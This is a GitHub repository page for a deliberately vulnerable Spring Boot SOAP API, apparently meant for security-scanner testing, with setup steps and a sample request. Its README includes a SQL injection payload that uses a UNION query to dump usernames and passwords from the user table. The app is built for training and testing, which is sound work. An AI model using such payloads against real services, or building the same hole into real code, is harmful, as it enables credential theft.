Skip to content

kaakaww/vulny-spring-soap-api

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

26 Commits
app
app
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
stackhawk.yml
stackhawk.yml
 
 

Repository files navigation

Spring boot SOAP example

Simple SOAP API using Spring Boot. Based on this tutorial.

Requires:

  • Gradle (wrapper in source)

Optional:

  • Docker

Run

cd app/
./gradlew bootRun

View the WDSL at http://localhost:9000/ws/vulnsoap.wsdl and post requests to http://localhost:9000/ws.

Example of a valid request (with header "Content-Type:text/xml"):

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <sch:GetCourseDetailsRequest xmlns:sch='http://www.stackhawk.com/vulnsoap'>
        <sch:name>history</sch:name>
    </sch:GetCourseDetailsRequest>
  </s11:Body>
</s11:Envelope>

Vulnerability

Example of a SQL injection request:

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <sch:GetCourseDetailsRequest xmlns:sch='http://www.stackhawk.com/vulnsoap'>
        <sch:name>history' union select id, username as name, password as description from user --</sch:name>
    </sch:GetCourseDetailsRequest>
  </s11:Body>
</s11:Envelope>

Docker


# build image
docker build -t local/vulny-soap .

# run image
docker run --rm --name vuln-soap -ti -p 9000:9000 local/vulny-soap

About

Vulnerable soap API in Spring Boot

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

2 stars

Watchers

10 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages